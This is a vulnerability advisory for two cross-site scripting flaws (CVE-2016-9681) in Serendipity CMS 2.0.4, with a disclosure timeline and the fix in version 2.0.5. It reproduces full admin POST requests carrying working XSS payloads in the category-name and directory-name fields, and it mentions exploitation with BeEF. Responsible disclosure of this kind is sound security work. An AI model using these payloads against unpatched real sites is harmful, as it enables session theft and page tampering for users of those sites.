Posted on

[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4


Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine which gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)


Vulnerability description:

There are two xss vulnerabilities in Serendipity CMS.

1) XSS in the creation of new category page

2) XSS in the creation of base directory page

Category Page


When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:


POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1 
Host: 127.0.0.1 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380
  
serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user creates another category.

Base Directory Page


When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:


POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed immediately upon creating the new directory and it occurs only once.


Impact:

An attacker is able to inject malicious scripts into otherwise benign and trusted web sites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of a HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).


Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html


Timeline:

Vulnerability found: 25.11.2016

Vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016


Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be